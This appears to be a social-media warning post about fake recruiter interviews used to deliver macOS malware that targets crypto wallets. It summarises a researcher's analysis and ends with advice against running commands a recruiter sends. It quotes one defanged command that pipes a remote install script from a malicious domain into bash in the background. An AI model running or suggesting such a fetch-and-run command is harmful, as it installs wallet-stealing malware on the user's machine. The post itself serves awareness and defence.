be careful of fake job interviews. they are now one of the cleanest malware delivery vectors.

my brother almost got hit this week.
the play, step by step:
> a "recruiter" pings him on linkedin
> they've actually read his cv. they know his stack. they book a real interview slot.
> a few hours before the call: "can you review our product page real quick before we talk?"
> visiting the site runs this in the background:
curl -s macos[.]hyperhives[.]net/install | nohup bash &
if you type your password when it prompts, it's over.
a researcher (Darksp33d on Github) reverse-engineered the binary:
> every config string encrypted with 570 unique custom functions
> once unwrapped: full c2 server, complete endpoint list, and a sentry error-tracking dsn that ties back to the developer under legal subpoena
> 276 targeted chrome extension ids, covering 188 crypto wallets
> ttp overlap with dprk "contagious interview" is strong
> 9/64 on virustotal. crowdstrike, sophos, malwarebytes, all missed it
real recruiters, real cvs, real interview slots, real-looking site. one curl line drains your wallets.
if a "recruiter" ever asks you to run anything in your terminal, even something as innocent as a build script before a tech interview, close the tab.